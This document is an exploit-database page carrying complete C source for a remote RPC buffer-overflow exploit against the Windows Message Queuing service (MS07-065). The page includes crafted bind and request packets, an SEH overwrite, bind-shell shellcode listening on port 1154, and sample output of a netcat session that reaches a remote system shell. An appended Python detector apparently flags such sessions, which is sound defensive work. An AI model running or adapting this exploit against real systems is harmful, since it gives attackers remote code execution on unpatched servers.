0day.today - Biggest Exploit Database in the World.
MS Windows Message Queuing Service RPC BOF Exploit (MS07-065)
=============================================================
MS Windows Message Queuing Service RPC BOF Exploit (MS07-065)
=============================================================

/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
by axis
http://www.ph4nt0m.org

you should know the dnsname of target to trigger this vuln
the service runs on port 2103/2105/2107

D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
--------------------------------------------------------------------------
-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
-== code by axis@ph4nt0m ==-
-== Http://www.ph4nt0m.org ==-
-== Tested against Windows 2000 server SP4 ==-
--------------------------------------------------------------------------
[+] Attacking default port 2103
[*]Sending our Payload, Good Luck! ^_^
[*]Sending RPC Bind String!
[*]Sending RPC Request Now!

D:\soft\develop\MyProjects\temp\Debug>

D:\>nc -vv -n 192.168.152.100 1154
(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error
Microsoft Windows 2000 [Version 5.00.2195]
(C) ???? 1985-2000 Microsoft Corp.
C:\WINNT\system32>exit exit sent 5, rcvd 109: NOTSOCK D:\> */ #include <stdio.h> #include <stdlib.h> #include <ctype.h> #include <winsock.h> #include <io.h> #pragma comment(lib,"ws2_32") // RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0 char bind_str[] = { 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11, 0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25, 0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 }; // RPC Request Opnum: 0x06 char request_1[] = { 0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00, 0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11, 0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25, 0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00, 0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00, // target's dns name (unicode) 0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00, 0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00, 0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00, 0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00, 0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0, // \xeb\x06\x42\x42 jmpcode 0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, // overwrite seh ; call ebx 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, // bindshell on port 1154, metasploit shellcode 0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b, 0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6, 0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83, 0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83, 0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3, 0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43, 0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6, 0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83, 0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e, 0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6, 0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1, 0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f, 0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c, 0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 
0xea, 0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6, 0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2, 0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f, 0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea, 0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1, 0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1, 0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1, 0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45, 0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d, 0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d, 0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb, 0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6, 0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44, 0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4, 0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67, 0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8, 0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c, 0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8, 0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31, 0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5, 0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3, 0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87, 0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5, 0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6, 0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c, 0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82, 0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41}; char request_2[] = { 0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11, 0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; void usage(char *argv) { printf(" Usage: %s -h 127.0.0.1 (Universal exploit)\n",argv); printf(" %s -h host [-p port]\n",argv); printf(" Targets:\n"); exit(1); } /************* TCP connect *************************/ void Disconnect(SOCKET s); // ripped from isno int Make_Connection(char *address,int port,int timeout) { struct sockaddr_in target; SOCKET s; int i; DWORD bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(address); if(target.sin_addr.s_addr==0) { closesocket(s); return -2; } target.sin_port = htons((short)port); bf = 1; ioctlsocket(s,FIONBIO,&bf); tv.tv_sec = timeout; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr *)&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { closesocket(s); return -3; } if(i==0) { closesocket(s); return -4; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i); 
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }

    ioctlsocket(s,FIONBIO,&bf);
    return s;
}

void Disconnect(SOCKET s)
{
    closesocket(s);
    WSACleanup();
}
/****************************************************/

int main(int argc, char * argv[]){
    unsigned char * target = NULL;
    int port = 2103;
    int i;
    int ret;
    int conn;
    char buffer[6000] = {0};
    SOCKET s;
    WSADATA WSAData;

    printf("--------------------------------------------------------------------------\n");
    printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n");
    printf("-== code by axis@ph4nt0m ==-\n");
    printf("-== Http://www.ph4nt0m.org ==-\n");
    printf("-== Tested against Windows 2000 server SP4 ==-\n");
    printf("--------------------------------------------------------------------------\n\n");

    if (argc==1)
        usage(argv[0]);

    //Handle parameters
    for(i=1;i<argc;i++)
    {
        if ( (argv[i][0]=='-') && (i+1<argc) )   // every option takes a value
        {
            switch (argv[i][1])
            {
                case 'h':
                    target=(unsigned char *)argv[i+1];
                    break;
                case 'p':
                    if (strcmp(argv[i+1],"2103")==0)
                    {
                        printf("[+] Attacking default port 2103\n");
                    }
                    else
                    {
                        port=atoi(argv[i+1]);
                    }
                    break;
                default:
                    printf("[-] Invalid argument: %s\n",argv[i]);
                    usage(argv[0]);
                    break;
            }
            i++;
        }
        else
            usage(argv[0]);
    }

    if (target == NULL)    // -h is mandatory; inet_addr(NULL) would crash
        usage(argv[0]);

    /********************** attack payload ***************************/
    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        fprintf(stderr, "[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }

    //Sleep(1200);
    // Make_Connection() returns a negative int on error; SOCKET is unsigned on
    // Windows, so the error check must be done on the int before the assignment
    conn = Make_Connection((char *)target, port, 10);
    if(conn<0)
    {
        fprintf(stderr, "[-] connect err.\n");
        exit(1);
    }
    s = (SOCKET)conn;

    //Send our evil Payload
    printf("[*]Sending our Payload, Good Luck! ^_^\n");
    printf("[*]Sending RPC Bind String!\n");
    send(s, bind_str, sizeof(bind_str), 0);
    Sleep(1000);

    printf("[*]Sending RPC Request Now!\n");
    memset(buffer, '\x41', sizeof(buffer));   // fill the buffer to trigger seh
    send(s, request_1, sizeof(request_1), 0);
    send(s, buffer, 5104, 0);                 // fill the buffer to trigger seh
    send(s, request_2, sizeof(request_2), 0);
    Sleep(100);

    memset(buffer, 0, sizeof(buffer));
    ret = recv(s, buffer, sizeof(buffer)-1, 0);
    //printf("recv: %s\n", buffer);

    Disconnect(s);
    return 0;
}

# 0day.today [2024-12-25] #
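A defender-side counterpart to the listing, added here as example code that is not part of the original exploit or of any vendor tooling: it decodes the DCE/RPC bind and request headers a client sends and flags a session to one of the MSMQ ports (2103/2105/2107) that binds to the interface UUID from bind_str and then issues an opnum-6 request whose stub is far larger than any DNS name. The 1024-byte threshold, the `build_*` sample constructors and their all-zero stubs are my assumptions for the offline test, not values from the page.

```python
import struct
import uuid
# Interface UUID, ports and opnum as they appear in the listing above
MSMQ_UUID = uuid.UUID("fdb3a030-065f-11d1-bb9b-00a024ea5525")
NDR_UUID = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")   # standard NDR transfer syntax
MSMQ_PORTS = {2103, 2105, 2107}
PTYPE_REQUEST, PTYPE_BIND, PFC_OBJECT_UUID = 0x00, 0x0B, 0x80
SUSPICIOUS_STUB = 1024   # assumed threshold: far larger than any queue-manager DNS name

def parse_pdu(pdu):
    """Decode the 16-byte DCE/RPC CO header plus the bind/request fields the detector needs."""
    if len(pdu) < 16 or pdu[0] != 5:
        return None
    ptype, flags, little = pdu[2], pdu[3], bool(pdu[4] & 0x10)
    end = "<" if little else ">"
    frag_len, _auth, call_id = struct.unpack(end + "HHI", pdu[8:16])
    info = {"ptype": ptype, "frag_len": frag_len, "call_id": call_id}
    if ptype == PTYPE_BIND and len(pdu) >= 52:
        # header(16) + max_xmit/max_recv/assoc_group(8) + ctx list hdr(4) + ctx id/count(4)
        raw = pdu[32:48]
        info["iface"] = uuid.UUID(bytes_le=raw) if little else uuid.UUID(bytes=raw)
    elif ptype == PTYPE_REQUEST and len(pdu) >= 24:
        _alloc, _ctx, info["opnum"] = struct.unpack(end + "IHH", pdu[16:24])
        info["stub_len"] = frag_len - (40 if flags & PFC_OBJECT_UUID else 24)
    return info

def classify_session(dst_port, pdus):
    """Flag a bind to the MSMQ interface followed by an oversized opnum-6 request."""
    findings, bound = [], False
    if dst_port not in MSMQ_PORTS:
        return findings
    for raw in pdus:
        p = parse_pdu(raw)
        if not p:
            continue
        if p["ptype"] == PTYPE_BIND and p.get("iface") == MSMQ_UUID:
            bound = True
        elif (bound and p["ptype"] == PTYPE_REQUEST and p.get("opnum") == 6
              and p.get("stub_len", 0) >= SUSPICIOUS_STUB):
            findings.append("MS07-065-style request: call_id=%d stub_len=%d"
                            % (p["call_id"], p["stub_len"]))
    return findings

def build_bind(iface):
    """Constructed sample: single-context bind PDU, same layout as the listing's bind_str."""
    body = (struct.pack("<HHIBxxxHBx", 5840, 5840, 0, 1, 0, 1) + iface.bytes_le
            + struct.pack("<I", 1) + NDR_UUID.bytes_le + struct.pack("<I", 2))
    return struct.pack("<BBBB4sHHI", 5, 0, PTYPE_BIND, 3, b"\x10\0\0\0", 16 + len(body), 0, 1) + body

def build_request(opnum, stub_len, obj=MSMQ_UUID):
    """Constructed sample: first-fragment request with object UUID and an all-zero stub."""
    hdr = struct.pack("<BBBB4sHHI", 5, 0, PTYPE_REQUEST, 0x81, b"\x10\0\0\0", 40 + stub_len, 0, 1)
    return hdr + struct.pack("<IHH", stub_len, 0, opnum) + obj.bytes_le + bytes(stub_len)
```

Feed it the client-side PDUs of a reassembled TCP session; a bind to any other interface, a normal-sized opnum-6 call, or traffic to a non-MSMQ port produces no finding.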